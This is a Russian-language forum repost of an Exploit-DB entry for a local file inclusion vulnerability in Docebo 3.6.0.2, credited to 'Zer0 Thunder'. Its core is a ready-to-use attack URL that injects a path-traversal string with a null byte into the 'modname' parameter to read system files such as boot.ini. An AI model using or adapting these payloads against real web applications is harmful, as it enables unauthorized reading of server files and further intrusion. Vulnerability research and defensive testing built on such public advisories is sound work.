Exploit Docebo 3.6.0.2 (stable) - Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
11028
Проверка EDB
  1. Пройдено
Автор
ZER0 THUNDER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-01-06
Код:
# Exploit Title: Docebo 3.6.0.2 (stable) Local File Inclusion 
# Date: 2010-01-06
# Author: Zer0 Thunder
# Site : http://www.docebolms.org/
# Software Link: http://www.docebolms.org/doceboCms/
# Version: 3.6.0.2
# Tested on: Windows XP sp2 [WampServer 2.0i] 
# CVE : 
# Code :

Exploit :
http://localhost/docebo/index.php?modname=[LFI]&op=lostpwd

Sample : ( Only Tested On Wamp 2.0i)
http://localhost/docebo/index.php?modname=../../../../../../../boot.ini%00&op=lostpwd


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

########################################
# MSN : [email protected]
# Email : [email protected]
# Site : LKHackers.com
# Greetz : To all my friends
# Note : Proud to be a Sri Lankan
# Me : Sri Lankan Hacker
########################################
 
Источник
www.exploit-db.com

Похожие темы